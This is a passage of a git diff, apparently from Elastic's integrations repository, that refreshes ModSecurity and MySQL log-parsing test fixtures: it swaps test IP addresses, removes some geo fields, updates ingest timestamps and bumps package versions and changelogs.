)\",\"reference\":\"o0,11v21,11\",\"ruleId\":\"920350\",\"file\":\"/etc/nginx/modsec/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\",\"lineNumber\":\"733\",\"data\":\"34.87.56.16\",\"severity\":\"4\",\"ver\":\"OWASP_CRS/3.0.0\",\"rev\":\"2\",\"tags\":[\"application-multi\",\"language-multi\",\"platform-multi\",\"attack-protocol\",\"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\",\"WASCTC/WASC-21\",\"OWASP_TOP_10/A7\",\"PCI/6.5.10\"],\"maturity\":\"9\",\"accuracy\":\"9\"}}]}}", + "ingested": "2021-12-09T13:41:30.595002200Z", + "original": "{\"transaction\":{\"client_ip\":\"67.43.156.15\",\"time_stamp\":\"Fri May 14 15:12:01 2021\",\"server_id\":\"c06217c4ac0d6f8892d2489cd5d92aaceec2508e\",\"client_port\":44460,\"host_ip\":\"67.43.156.15\",\"host_port\":443,\"id\":\"162100512158.550855\",\"request\":{\"method\":\"GET\",\"http_version\":1.1,\"uri\":\"/\",\"headers\":{\"Host\":\"34.87.56.16\",\"Connection\":\"close\"}},\"response\":{\"http_code\":200,\"headers\":{\"Vary\":\"Accept-Encoding, Origin\",\"X-XSS-Protection\":\"1; mode=block\",\"Set-Cookie\":\"_pmcapi_session=db4a0ad600d22d8015c49062844b3ac9; path=/; HttpOnly\",\"X-Permitted-Cross-Domain-Policies\":\"none\",\"Cache-Control\":\"max-age=0, private, must-revalidate\",\"ETag\":\"W/\\\"4b55096b2de9c691c0e0f67a496dc7d9\\\"\",\"Strict-Transport-Security\":\"max-age=31536000; includeSubDomains\",\"Status\":\"200 OK\",\"Connection\":\"close\",\"X-Powered-By\":\"Phusion Passenger 6.0.2\",\"Content-Type\":\"text/html; charset=utf-8\",\"Content-Length\":\"12475\",\"Date\":\"Fri, 14 May 2021 15:12:01 GMT\",\"Server\":\"nginx/1.14.0\",\"X-Request-Id\":\"b7220068-a82e-4535-be4c-a087fe3901ed\",\"X-Download-Options\":\"noopen\",\"X-Runtime\":\"0.029745\",\"X-Content-Type-Options\":\"nosniff\",\"X-Frame-Options\":\"SAMEORIGIN\",\"Via\":\"1.1 google\"}},\"producer\":{\"modsecurity\":\"ModSecurity v3.0.2 (Linux)\",\"connector\":\"ModSecurity-nginx v0.1.1-beta\",\"secrules_engine\":\"Enabled\",\"components\":[\"OWASP_CRS/3.0.2\\\"\"]},\"messages\":[{\"message\":\"Host header is a numeric IP address\",\"details\":{\"match\":\"Matched \\\"Operator `Rx' with parameter `^[\\\\d.:]+$' against variable `REQUEST_HEADERS:Host' (Value: `34.87.56.16' )\",\"reference\":\"o0,11v21,11\",\"ruleId\":\"920350\",\"file\":\"/etc/nginx/modsec/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\",\"lineNumber\":\"733\",\"data\":\"34.87.56.16\",\"severity\":\"4\",\"ver\":\"OWASP_CRS/3.0.0\",\"rev\":\"2\",\"tags\":[\"application-multi\",\"language-multi\",\"platform-multi\",\"attack-protocol\",\"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\",\"WASCTC/WASC-21\",\"OWASP_TOP_10/A7\",\"PCI/6.5.10\"],\"maturity\":\"9\",\"accuracy\":\"9\"}}]}}", "category": [ "web" ], @@ -221,23 +173,8 @@ "id": "920350" }, "source": { - "geo": { - "continent_name": "Asia", - "country_name": "Singapore", - "location": { - "lon": 103.8, - "lat": 1.3667 - }, - "country_iso_code": "SG" - }, - "as": { - "number": 132203, - "organization": { - "name": "Tencent Building, Kejizhongyi Avenue" - } - }, "port": 45952, - "ip": "162.62.123.46" + "ip": "67.43.156.15" }, "message": "Host header is a numeric IP address", "url": { @@ -265,8 +202,8 @@ } }, "event": { - "ingested": "2021-09-17T03:51:00.601681843Z", - "original": "{\"transaction\":{\"client_ip\":\"162.62.123.46\",\"time_stamp\":\"Fri May 14 15:12:18 2021\",\"server_id\":\"c06217c4ac0d6f8892d2489cd5d92aaceec2508e\",\"client_port\":45952,\"host_ip\":\"162.62.123.46\",\"host_port\":443,\"id\":\"162100513893.802359\",\"request\":{\"method\":\"GET\",\"http_version\":1.0,\"uri\":\"/\",\"headers\":{\"Host\":\"34.87.56.16\",\"Connection\":\"close\"}},\"response\":{\"http_code\":200,\"headers\":{\"Vary\":\"Accept-Encoding, Origin\",\"X-XSS-Protection\":\"1; mode=block\",\"Set-Cookie\":\"_pmcapi_session=e1e011a4d0188a1453cc4b8b9f3e476c; path=/; HttpOnly\",\"X-Permitted-Cross-Domain-Policies\":\"none\",\"Cache-Control\":\"max-age=0, private, must-revalidate\",\"ETag\":\"W/\\\"f7e5c631964147f2a3458c4f97647883\\\"\",\"Strict-Transport-Security\":\"max-age=31536000; includeSubDomains\",\"Status\":\"200 OK\",\"Connection\":\"close\",\"X-Powered-By\":\"Phusion Passenger 6.0.2\",\"Content-Type\":\"text/html; charset=utf-8\",\"Content-Length\":\"12475\",\"Date\":\"Fri, 14 May 2021 15:12:18 GMT\",\"Server\":\"nginx/1.14.0\",\"X-Request-Id\":\"15fa3f35-b204-4b2a-bbd8-7aec1d8e4417\",\"X-Download-Options\":\"noopen\",\"X-Runtime\":\"0.026203\",\"X-Content-Type-Options\":\"nosniff\",\"X-Frame-Options\":\"SAMEORIGIN\",\"Via\":\"1.1 google\"}},\"producer\":{\"modsecurity\":\"ModSecurity v3.0.2 (Linux)\",\"connector\":\"ModSecurity-nginx v0.1.1-beta\",\"secrules_engine\":\"Enabled\",\"components\":[\"OWASP_CRS/3.0.2\\\"\"]},\"messages\":[{\"message\":\"Host header is a numeric IP address\",\"details\":{\"match\":\"Matched \\\"Operator `Rx' with parameter `^[\\\\d.:]+$' against variable `REQUEST_HEADERS:Host' (Value: `34.87.56.16' )\",\"reference\":\"o0,11v21,11\",\"ruleId\":\"920350\",\"file\":\"/etc/nginx/modsec/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\",\"lineNumber\":\"733\",\"data\":\"34.87.56.16\",\"severity\":\"4\",\"ver\":\"OWASP_CRS/3.0.0\",\"rev\":\"2\",\"tags\":[\"application-multi\",\"language-multi\",\"platform-multi\",\"attack-protocol\",\"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\",\"WASCTC/WASC-21\",\"OWASP_TOP_10/A7\",\"PCI/6.5.10\"],\"maturity\":\"9\",\"accuracy\":\"9\"}}]}}", + "ingested": "2021-12-09T13:41:30.595009200Z", + "original": "{\"transaction\":{\"client_ip\":\"67.43.156.15\",\"time_stamp\":\"Fri May 14 15:12:18 2021\",\"server_id\":\"c06217c4ac0d6f8892d2489cd5d92aaceec2508e\",\"client_port\":45952,\"host_ip\":\"67.43.156.15\",\"host_port\":443,\"id\":\"162100513893.802359\",\"request\":{\"method\":\"GET\",\"http_version\":1.0,\"uri\":\"/\",\"headers\":{\"Host\":\"34.87.56.16\",\"Connection\":\"close\"}},\"response\":{\"http_code\":200,\"headers\":{\"Vary\":\"Accept-Encoding, Origin\",\"X-XSS-Protection\":\"1; mode=block\",\"Set-Cookie\":\"_pmcapi_session=e1e011a4d0188a1453cc4b8b9f3e476c; path=/; HttpOnly\",\"X-Permitted-Cross-Domain-Policies\":\"none\",\"Cache-Control\":\"max-age=0, private, must-revalidate\",\"ETag\":\"W/\\\"f7e5c631964147f2a3458c4f97647883\\\"\",\"Strict-Transport-Security\":\"max-age=31536000; includeSubDomains\",\"Status\":\"200 OK\",\"Connection\":\"close\",\"X-Powered-By\":\"Phusion Passenger 6.0.2\",\"Content-Type\":\"text/html; charset=utf-8\",\"Content-Length\":\"12475\",\"Date\":\"Fri, 14 May 2021 15:12:18 GMT\",\"Server\":\"nginx/1.14.0\",\"X-Request-Id\":\"15fa3f35-b204-4b2a-bbd8-7aec1d8e4417\",\"X-Download-Options\":\"noopen\",\"X-Runtime\":\"0.026203\",\"X-Content-Type-Options\":\"nosniff\",\"X-Frame-Options\":\"SAMEORIGIN\",\"Via\":\"1.1 google\"}},\"producer\":{\"modsecurity\":\"ModSecurity v3.0.2 (Linux)\",\"connector\":\"ModSecurity-nginx v0.1.1-beta\",\"secrules_engine\":\"Enabled\",\"components\":[\"OWASP_CRS/3.0.2\\\"\"]},\"messages\":[{\"message\":\"Host header is a numeric IP address\",\"details\":{\"match\":\"Matched \\\"Operator `Rx' with parameter `^[\\\\d.:]+$' against variable `REQUEST_HEADERS:Host' (Value: `34.87.56.16' )\",\"reference\":\"o0,11v21,11\",\"ruleId\":\"920350\",\"file\":\"/etc/nginx/modsec/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\",\"lineNumber\":\"733\",\"data\":\"34.87.56.16\",\"severity\":\"4\",\"ver\":\"OWASP_CRS/3.0.0\",\"rev\":\"2\",\"tags\":[\"application-multi\",\"language-multi\",\"platform-multi\",\"attack-protocol\",\"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\",\"WASCTC/WASC-21\",\"OWASP_TOP_10/A7\",\"PCI/6.5.10\"],\"maturity\":\"9\",\"accuracy\":\"9\"}}]}}", "category": [ "web" ], diff --git a/packages/modsecurity/manifest.yml b/packages/modsecurity/manifest.yml index 8aec54718f4..daf276bcab7 100644 --- a/packages/modsecurity/manifest.yml +++ b/packages/modsecurity/manifest.yml @@ -1,7 +1,7 @@ format_version: 1.0.0 name: modsecurity title: "ModSecurity Audit" -version: 0.1.1 +version: 0.1.2 license: basic description: "ModSecuirty Audit Log Integration" type: integration diff --git a/packages/mysql/changelog.yml b/packages/mysql/changelog.yml index 33aca2a9b90..1d663081d86 100644 --- a/packages/mysql/changelog.yml +++ b/packages/mysql/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.2.1" + changes: + - description: Change test public IPs to the supported subset + type: bugfix + link: https://github.com/elastic/integrations/pull/2327 - version: "1.2.0" changes: - description: Release package for v8.0.0 diff --git a/packages/mysql/data_stream/error/_dev/test/pipeline/test-error.log-expected.json b/packages/mysql/data_stream/error/_dev/test/pipeline/test-error.log-expected.json index fbc80f1cc2c..787458364fa 100644 --- a/packages/mysql/data_stream/error/_dev/test/pipeline/test-error.log-expected.json +++ b/packages/mysql/data_stream/error/_dev/test/pipeline/test-error.log-expected.json @@ -4,7 +4,7 @@ "@timestamp": "2016-12-09T13:08:33.000Z", "message": "mysqld_safe Starting mysqld daemon with databases from /usr/local/var/mysql", "event": { - "ingested": "2021-06-21T12:35:16.955301274Z", + "ingested": "2021-12-09T13:41:32.752808400Z", "category": [ "database" ], @@ -25,7 +25,7 @@ }, "message": "TIMESTAMP with implicit DEFAULT value is deprecated. Please use --explicit_defaults_for_timestamp server option (see documentation for more details).", "event": { - "ingested": "2021-06-21T12:35:16.955304679Z", + "ingested": "2021-12-09T13:41:32.752817300Z", "category": [ "database" ], @@ -46,7 +46,7 @@ }, "message": "Insecure configuration for --secure-file-priv: Current value does not restrict location of generated files. Consider setting it to a valid, non-empty path.", "event": { - "ingested": "2021-06-21T12:35:16.955305338Z", + "ingested": "2021-12-09T13:41:32.752823300Z", "category": [ "database" ], @@ -67,7 +67,7 @@ }, "message": "/usr/local/Cellar/mysql/5.7.10/bin/mysqld (mysqld 5.7.10) starting as process 61571 ...", "event": { - "ingested": "2021-06-21T12:35:16.955305836Z", + "ingested": "2021-12-09T13:41:32.752828900Z", "category": [ "database" ], @@ -88,7 +88,7 @@ }, "message": "Setting lower_case_table_names=2 because file system for /usr/local/var/mysql/ is case insensitive", "event": { - "ingested": "2021-06-21T12:35:16.955306317Z", + "ingested": "2021-12-09T13:41:32.752834500Z", "category": [ "database" ], @@ -109,7 +109,7 @@ }, "message": "InnoDB: Mutexes and rw_locks use GCC atomic builtins", "event": { - "ingested": "2021-06-21T12:35:16.955306806Z", + "ingested": "2021-12-09T13:41:32.752840100Z", "category": [ "database" ], @@ -130,7 +130,7 @@ }, "message": "/usr/local/Cellar/mysql/5.7.10/bin/mysqld: ready for connections.", "event": { - "ingested": "2021-06-21T12:35:16.955307285Z", + "ingested": "2021-12-09T13:41:32.752845800Z", "category": [ "database" ], @@ -144,7 +144,7 @@ { "message": "Version: '5.7.10' socket: '/tmp/mysql.sock' port: 3306 Homebrew", "event": { - "ingested": "2021-06-21T12:35:16.955307777Z", + "ingested": "2021-12-09T13:41:32.752851400Z", "category": [ "database" ], @@ -165,7 +165,7 @@ }, "message": "InnoDB: page_cleaner: 1000ms intended loop took 772568ms. The settings might not be optimal. (flushed=0 and evicted=0, during the time.)", "event": { - "ingested": "2021-06-21T12:35:16.955308261Z", + "ingested": "2021-12-09T13:41:32.752857100Z", "category": [ "database" ], @@ -183,7 +183,7 @@ }, "message": "Using unique option prefix myisam-recover instead of myisam-recover-options is deprecated and will be removed in a future release. Please use the full name instead.", "event": { - "ingested": "2021-06-21T12:35:16.955308746Z", + "ingested": "2021-12-09T13:41:32.752862800Z", "category": [ "database" ], @@ -201,7 +201,7 @@ }, "message": "Plugin 'FEDERATED' is disabled.", "event": { - "ingested": "2021-06-21T12:35:16.955309232Z", + "ingested": "2021-12-09T13:41:32.752868500Z", "category": [ "database" ], @@ -216,7 +216,7 @@ "@timestamp": "2016-12-09T14:18:50.000Z", "message": "InnoDB: The InnoDB memory heap is disabled", "event": { - "ingested": "2021-06-21T12:35:16.955309894Z", + "ingested": "2021-12-09T13:41:32.752874600Z", "category": [ "database" ], diff --git a/packages/mysql/data_stream/error/_dev/test/pipeline/test-mariadb-10-4-8.log-expected.json b/packages/mysql/data_stream/error/_dev/test/pipeline/test-mariadb-10-4-8.log-expected.json index edd7fc53e6b..592df9c2e13 100644 --- a/packages/mysql/data_stream/error/_dev/test/pipeline/test-mariadb-10-4-8.log-expected.json +++ b/packages/mysql/data_stream/error/_dev/test/pipeline/test-mariadb-10-4-8.log-expected.json @@ -7,7 +7,7 @@ }, "message": "Query\tSHOW /*!50002 GLOBAL */ STATUS", "event": { - "ingested": "2021-06-21T12:35:17.024535715Z", + "ingested": "2021-12-09T13:41:32.856137800Z", "category": [ "database" ], @@ -28,7 +28,7 @@ }, "message": "InnoDB: Using Linux native AIO", "event": { - "ingested": "2021-06-21T12:35:17.024538668Z", + "ingested": "2021-12-09T13:41:32.856147200Z", "category": [ "database" ], @@ -49,7 +49,7 @@ }, "message": "InnoDB: Mutexes and rw_locks use GCC atomic builtins", "event": { - "ingested": "2021-06-21T12:35:17.024539277Z", + "ingested": "2021-12-09T13:41:32.856153400Z", "category": [ "database" ], @@ -70,7 +70,7 @@ }, "message": "InnoDB: Uses event mutexes", "event": { - "ingested": "2021-06-21T12:35:17.024539789Z", + "ingested": "2021-12-09T13:41:32.856159300Z", "category": [ "database" ], @@ -91,7 +91,7 @@ }, "message": "InnoDB: Compressed tables use zlib 1.2.7", "event": { - "ingested": "2021-06-21T12:35:17.024540289Z", + "ingested": "2021-12-09T13:41:32.856165Z", "category": [ "database" ], @@ -112,7 +112,7 @@ }, "message": "InnoDB: Number of pools: 1", "event": { - "ingested": "2021-06-21T12:35:17.024540789Z", + "ingested": "2021-12-09T13:41:32.856170700Z", "category": [ "database" ], @@ -133,7 +133,7 @@ }, "message": "InnoDB: Using SSE2 crc32 instructions", "event": { - "ingested": "2021-06-21T12:35:17.024541291Z", + "ingested": "2021-12-09T13:41:32.856176500Z", "category": [ "database" ], @@ -154,7 +154,7 @@ }, "message": "InnoDB: Initializing buffer pool, total size = 128M, instances = 1, chunk size = 128M", "event": { - "ingested": "2021-06-21T12:35:17.024541793Z", + "ingested": "2021-12-09T13:41:32.856182500Z", "category": [ "database" ], @@ -175,7 +175,7 @@ }, "message": "InnoDB: Completed initialization of buffer pool", "event": { - "ingested": "2021-06-21T12:35:17.024542299Z", + "ingested": "2021-12-09T13:41:32.856188500Z", "category": [ "database" ], @@ -196,7 +196,7 @@ }, "message": "InnoDB: If the mysqld execution user is authorized, page cleaner thread priority can be changed. See the man page of setpriority().", "event": { - "ingested": "2021-06-21T12:35:17.024542800Z", + "ingested": "2021-12-09T13:41:32.856192Z", "category": [ "database" ], @@ -217,7 +217,7 @@ }, "message": "InnoDB: 128 out of 128 rollback segments are active.", "event": { - "ingested": "2021-06-21T12:35:17.024543296Z", + "ingested": "2021-12-09T13:41:32.856196600Z", "category": [ "database" ], @@ -238,7 +238,7 @@ }, "message": "InnoDB: Creating shared tablespace for temporary tables", "event": { - "ingested": "2021-06-21T12:35:17.024543963Z", + "ingested": "2021-12-09T13:41:32.856202Z", "category": [ "database" ], @@ -259,7 +259,7 @@ }, "message": "InnoDB: Setting file './ibtmp1' size to 12 MB. Physically writing the file full; Please wait ...", "event": { - "ingested": "2021-06-21T12:35:17.024544466Z", + "ingested": "2021-12-09T13:41:32.856207100Z", "category": [ "database" ], @@ -280,7 +280,7 @@ }, "message": "InnoDB: File './ibtmp1' size is now 12 MB.", "event": { - "ingested": "2021-06-21T12:35:17.024544980Z", + "ingested": "2021-12-09T13:41:32.856211100Z", "category": [ "database" ], @@ -301,7 +301,7 @@ }, "message": "InnoDB: Waiting for purge to start", "event": { - "ingested": "2021-06-21T12:35:17.024545484Z", + "ingested": "2021-12-09T13:41:32.856218200Z", "category": [ "database" ], @@ -322,7 +322,7 @@ }, "message": "InnoDB: 10.4.8 started; log sequence number 1631101; transaction id 791", "event": { - "ingested": "2021-06-21T12:35:17.024545985Z", + "ingested": "2021-12-09T13:41:32.856222800Z", "category": [ "database" ], @@ -343,7 +343,7 @@ }, "message": "InnoDB: Loading buffer pool(s) from /data/mysqldata/mysql/ib_buffer_pool", "event": { - "ingested": "2021-06-21T12:35:17.024546625Z", + "ingested": "2021-12-09T13:41:32.856229Z", "category": [ "database" ], @@ -364,7 +364,7 @@ }, "message": "Plugin 'FEEDBACK' is disabled.", "event": { - "ingested": "2021-06-21T12:35:17.024547127Z", + "ingested": "2021-12-09T13:41:32.856233500Z", "category": [ "database" ], @@ -385,7 +385,7 @@ }, "message": "InnoDB: Buffer pool(s) load completed at 191016 17:24:15", "event": { - "ingested": "2021-06-21T12:35:17.024547631Z", + "ingested": "2021-12-09T13:41:32.856237800Z", "category": [ "database" ], @@ -406,7 +406,7 @@ }, "message": "Server socket created on IP: '::'.", "event": { - "ingested": "2021-06-21T12:35:17.024548206Z", + "ingested": "2021-12-09T13:41:32.856242300Z", "category": [ "database" ], @@ -427,7 +427,7 @@ }, "message": "Reading of all Master_info entries succeeded", "event": { - "ingested": "2021-06-21T12:35:17.024548703Z", + "ingested": "2021-12-09T13:41:32.856247100Z", "category": [ "database" ], @@ -448,7 +448,7 @@ }, "message": "Added new Master_info '' to hash table", "event": { - "ingested": "2021-06-21T12:35:17.024549206Z", + "ingested": "2021-12-09T13:41:32.856252Z", "category": [ "database" ], @@ -469,7 +469,7 @@ }, "message": "/usr/sbin/mysqld: ready for connections.", "event": { - "ingested": "2021-06-21T12:35:17.024549697Z", + "ingested": "2021-12-09T13:41:32.856257800Z", "category": [ "database" ], @@ -483,7 +483,7 @@ { "message": "Version: '10.4.8-MariaDB-log' socket: '/data/mysqldata/mysql.sock' port: 3306 MariaDB Server", "event": { - "ingested": "2021-06-21T12:35:17.024550325Z", + "ingested": "2021-12-09T13:41:32.856263800Z", "category": [ "database" ], @@ -504,7 +504,7 @@ }, "message": "Event Scheduler: scheduler thread started with id 11", "event": { - "ingested": "2021-06-21T12:35:17.024550829Z", + "ingested": "2021-12-09T13:41:32.856269500Z", "category": [ "database" ], @@ -525,7 +525,7 @@ }, "message": "Event Scheduler: Last execution of test.test_error_log. Dropping.", "event": { - "ingested": "2021-06-21T12:35:17.024551329Z", + "ingested": "2021-12-09T13:41:32.856275300Z", "category": [ "database" ], @@ -546,7 +546,7 @@ }, "message": "Event Scheduler: Dropping test.test_error_log", "event": { - "ingested": "2021-06-21T12:35:17.024551830Z", + "ingested": "2021-12-09T13:41:32.856281100Z", "category": [ "database" ], @@ -567,7 +567,7 @@ }, "message": "Event Scheduler: [root@localhost][test.test_error_log] hi from the error log", "event": { - "ingested": "2021-06-21T12:35:17.024552326Z", + "ingested": "2021-12-09T13:41:32.856286900Z", "category": [ "database" ], @@ -589,7 +589,7 @@ }, "message": "Event Scheduler: [root@localhost][test.test_error_log] At line 1 in test.test_error_log", "event": { - "ingested": "2021-06-21T12:35:17.024552826Z", + "ingested": "2021-12-09T13:41:32.856292700Z", "category": [ "database" ], @@ -603,7 +603,7 @@ { "message": "", "event": { - "ingested": "2021-06-21T12:35:17.024553322Z", + "ingested": "2021-12-09T13:41:32.856298600Z", "category": [ "database" ], diff --git a/packages/mysql/data_stream/error/_dev/test/pipeline/test-mysql-darwin-brew-5-7-10.log-expected.json b/packages/mysql/data_stream/error/_dev/test/pipeline/test-mysql-darwin-brew-5-7-10.log-expected.json index c1ed4e3e2db..41717b86c92 100644 --- a/packages/mysql/data_stream/error/_dev/test/pipeline/test-mysql-darwin-brew-5-7-10.log-expected.json +++ b/packages/mysql/data_stream/error/_dev/test/pipeline/test-mysql-darwin-brew-5-7-10.log-expected.json @@ -4,7 +4,7 @@ "@timestamp": "2016-12-09T13:08:33.000Z", "message": "mysqld_safe Starting mysqld daemon with databases from /usr/local/var/mysql", "event": { - "ingested": "2021-06-21T12:35:17.188528056Z", + "ingested": "2021-12-09T13:41:33.114509700Z", "category": [ "database" ], @@ -25,7 +25,7 @@ }, "message": "TIMESTAMP with implicit DEFAULT value is deprecated. Please use --explicit_defaults_for_timestamp server option (see documentation for more details).", "event": { - "ingested": "2021-06-21T12:35:17.188530549Z", + "ingested": "2021-12-09T13:41:33.114519Z", "category": [ "database" ], @@ -46,7 +46,7 @@ }, "message": "Insecure configuration for --secure-file-priv: Current value does not restrict location of generated files. Consider setting it to a valid, non-empty path.", "event": { - "ingested": "2021-06-21T12:35:17.188531062Z", + "ingested": "2021-12-09T13:41:33.114522800Z", "category": [ "database" ], @@ -67,7 +67,7 @@ }, "message": "/usr/local/Cellar/mysql/5.7.10/bin/mysqld (mysqld 5.7.10) starting as process 61571 ...", "event": { - "ingested": "2021-06-21T12:35:17.188531515Z", + "ingested": "2021-12-09T13:41:33.114527500Z", "category": [ "database" ], @@ -88,7 +88,7 @@ }, "message": "Setting lower_case_table_names=2 because file system for /usr/local/var/mysql/ is case insensitive", "event": { - "ingested": "2021-06-21T12:35:17.188531968Z", + "ingested": "2021-12-09T13:41:33.114533200Z", "category": [ "database" ], @@ -109,7 +109,7 @@ }, "message": "InnoDB: Mutexes and rw_locks use GCC atomic builtins", "event": { - "ingested": "2021-06-21T12:35:17.188532414Z", + "ingested": "2021-12-09T13:41:33.114539100Z", "category": [ "database" ], @@ -130,7 +130,7 @@ }, "message": "InnoDB: Uses event mutexes", "event": { - "ingested": "2021-06-21T12:35:17.188532867Z", + "ingested": "2021-12-09T13:41:33.114545100Z", "category": [ "database" ], @@ -151,7 +151,7 @@ }, "message": "InnoDB: GCC builtin __atomic_thread_fence() is used for memory barrier", "event": { - "ingested": "2021-06-21T12:35:17.188533346Z", + "ingested": "2021-12-09T13:41:33.114550900Z", "category": [ "database" ], @@ -172,7 +172,7 @@ }, "message": "InnoDB: Compressed tables use zlib 1.2.3", "event": { - "ingested": "2021-06-21T12:35:17.188533926Z", + "ingested": "2021-12-09T13:41:33.114556600Z", "category": [ "database" ], @@ -193,7 +193,7 @@ }, "message": "InnoDB: Number of pools: 1", "event": { - "ingested": "2021-06-21T12:35:17.188534381Z", + "ingested": "2021-12-09T13:41:33.114562400Z", "category": [ "database" ], @@ -214,7 +214,7 @@ }, "message": "InnoDB: Using CPU crc32 instructions", "event": { - "ingested": "2021-06-21T12:35:17.188534892Z", + "ingested": "2021-12-09T13:41:33.114568200Z", "category": [ "database" ], @@ -235,7 +235,7 @@ }, "message": "InnoDB: Initializing buffer pool, total size = 128M, instances = 1, chunk size = 128M", "event": { - "ingested": "2021-06-21T12:35:17.188535529Z", + "ingested": "2021-12-09T13:41:33.114575700Z", "category": [ "database" ], @@ -256,7 +256,7 @@ }, "message": "InnoDB: Completed initialization of buffer pool", "event": { - "ingested": "2021-06-21T12:35:17.188535990Z", + "ingested": "2021-12-09T13:41:33.114581800Z", "category": [ "database" ], @@ -277,7 +277,7 @@ }, "message": "InnoDB: Highest supported file format is Barracuda.", "event": { - "ingested": "2021-06-21T12:35:17.188536444Z", + "ingested": "2021-12-09T13:41:33.114587600Z", "category": [ "database" ], @@ -298,7 +298,7 @@ }, "message": "InnoDB: Log scan progressed past the checkpoint lsn 2498863", "event": { - "ingested": "2021-06-21T12:35:17.188536972Z", + "ingested": "2021-12-09T13:41:33.114593500Z", "category": [ "database" ], @@ -319,7 +319,7 @@ }, "message": "InnoDB: Doing recovery: scanned up to log sequence number 2498872", "event": { - "ingested": "2021-06-21T12:35:17.188537533Z", + "ingested": "2021-12-09T13:41:33.114599300Z", "category": [ "database" ], @@ -340,7 +340,7 @@ }, "message": "InnoDB: Doing recovery: scanned up to log sequence number 2498872", "event": { - "ingested": "2021-06-21T12:35:17.188538111Z", + "ingested": "2021-12-09T13:41:33.114605400Z", "category": [ "database" ], @@ -361,7 +361,7 @@ }, "message": "InnoDB: Database was not shutdown normally!", "event": { - "ingested": "2021-06-21T12:35:17.188538567Z", + "ingested": "2021-12-09T13:41:33.114625600Z", "category": [ "database" ], @@ -382,7 +382,7 @@ }, "message": "InnoDB: Starting crash recovery.", "event": { - "ingested": "2021-06-21T12:35:17.188539106Z", + "ingested": "2021-12-09T13:41:33.114630700Z", "category": [ "database" ], @@ -403,7 +403,7 @@ }, "message": "InnoDB: Removed temporary tablespace data file: \"ibtmp1\"", "event": { - "ingested": "2021-06-21T12:35:17.188539571Z", + "ingested": "2021-12-09T13:41:33.114635900Z", "category": [ "database" ], @@ -424,7 +424,7 @@ }, "message": "InnoDB: Creating shared tablespace for temporary tables", "event": { - "ingested": "2021-06-21T12:35:17.188540023Z", + "ingested": "2021-12-09T13:41:33.114641Z", "category": [ "database" ], @@ -445,7 +445,7 @@ }, "message": "InnoDB: Setting file './ibtmp1' size to 12 MB. Physically writing the file full; Please wait ...", "event": { - "ingested": "2021-06-21T12:35:17.188540548Z", + "ingested": "2021-12-09T13:41:33.114645500Z", "category": [ "database" ], @@ -466,7 +466,7 @@ }, "message": "InnoDB: File './ibtmp1' size is now 12 MB.", "event": { - "ingested": "2021-06-21T12:35:17.188541075Z", + "ingested": "2021-12-09T13:41:33.114649700Z", "category": [ "database" ], @@ -487,7 +487,7 @@ }, "message": "InnoDB: 96 redo rollback segment(s) found. 96 redo rollback segment(s) are active.", "event": { - "ingested": "2021-06-21T12:35:17.188541647Z", + "ingested": "2021-12-09T13:41:33.114653900Z", "category": [ "database" ], @@ -508,7 +508,7 @@ }, "message": "InnoDB: 32 non-redo rollback segment(s) are active.", "event": { - "ingested": "2021-06-21T12:35:17.188542099Z", + "ingested": "2021-12-09T13:41:33.114675200Z", "category": [ "database" ], @@ -529,7 +529,7 @@ }, "message": "InnoDB: Waiting for purge to start", "event": { - "ingested": "2021-06-21T12:35:17.188542551Z", + "ingested": "2021-12-09T13:41:33.114680100Z", "category": [ "database" ], @@ -550,7 +550,7 @@ }, "message": "InnoDB: 5.7.10 started; log sequence number 2498872", "event": { - "ingested": "2021-06-21T12:35:17.188543011Z", + "ingested": "2021-12-09T13:41:33.114686100Z", "category": [ "database" ], @@ -571,7 +571,7 @@ }, "message": "InnoDB: Loading buffer pool(s) from /usr/local/var/mysql/ib_buffer_pool", "event": { - "ingested": "2021-06-21T12:35:17.188543477Z", + "ingested": "2021-12-09T13:41:33.114692100Z", "category": [ "database" ], @@ -592,7 +592,7 @@ }, "message": "InnoDB: not started", "event": { - "ingested": "2021-06-21T12:35:17.188543937Z", + "ingested": "2021-12-09T13:41:33.114698Z", "category": [ "database" ], @@ -613,7 +613,7 @@ }, "message": "Plugin 'FEDERATED' is disabled.", "event": { - "ingested": "2021-06-21T12:35:17.188544453Z", + "ingested": "2021-12-09T13:41:33.114703800Z", "category": [ "database" ], @@ -634,7 +634,7 @@ }, "message": "InnoDB: Buffer pool(s) load completed at 161209 13:08:33", "event": { - "ingested": "2021-06-21T12:35:17.188544910Z", + "ingested": "2021-12-09T13:41:33.114709800Z", "category": [ "database" ], @@ -655,7 +655,7 @@ }, "message": "Found ca.pem, server-cert.pem and server-key.pem in data directory. Trying to enable SSL support using them.", "event": { - "ingested": "2021-06-21T12:35:17.188545365Z", + "ingested": "2021-12-09T13:41:33.114715600Z", "category": [ "database" ], @@ -676,7 +676,7 @@ }, "message": "Skipping generation of SSL certificates as certificate files are present in data directory.", "event": { - "ingested": "2021-06-21T12:35:17.188545832Z", + "ingested": "2021-12-09T13:41:33.114721600Z", "category": [ "database" ], @@ -697,7 +697,7 @@ }, "message": "CA certificate ca.pem is self signed.", "event": { - "ingested": "2021-06-21T12:35:17.188546293Z", + "ingested": "2021-12-09T13:41:33.114727500Z", "category": [ "database" ], @@ -718,7 +718,7 @@ }, "message": "Skipping generation of RSA key pair as key files are present in data directory.", "event": { - "ingested": "2021-06-21T12:35:17.188546865Z", + "ingested": "2021-12-09T13:41:33.114733600Z", "category": [ "database" ], @@ -739,7 +739,7 @@ }, "message": "Server hostname (bind-address): '*'; port: 3306", "event": { - "ingested": "2021-06-21T12:35:17.188547403Z", + "ingested": "2021-12-09T13:41:33.114739500Z", "category": [ "database" ], @@ -760,7 +760,7 @@ }, "message": "IPv6 is available.", "event": { - "ingested": "2021-06-21T12:35:17.188547935Z", + "ingested": "2021-12-09T13:41:33.114745500Z", "category": [ "database" ], @@ -781,7 +781,7 @@ }, "message": "- '::' resolves to '::';", "event": { - "ingested": "2021-06-21T12:35:17.188550521Z", + "ingested": "2021-12-09T13:41:33.114751400Z", "category": [ "database" 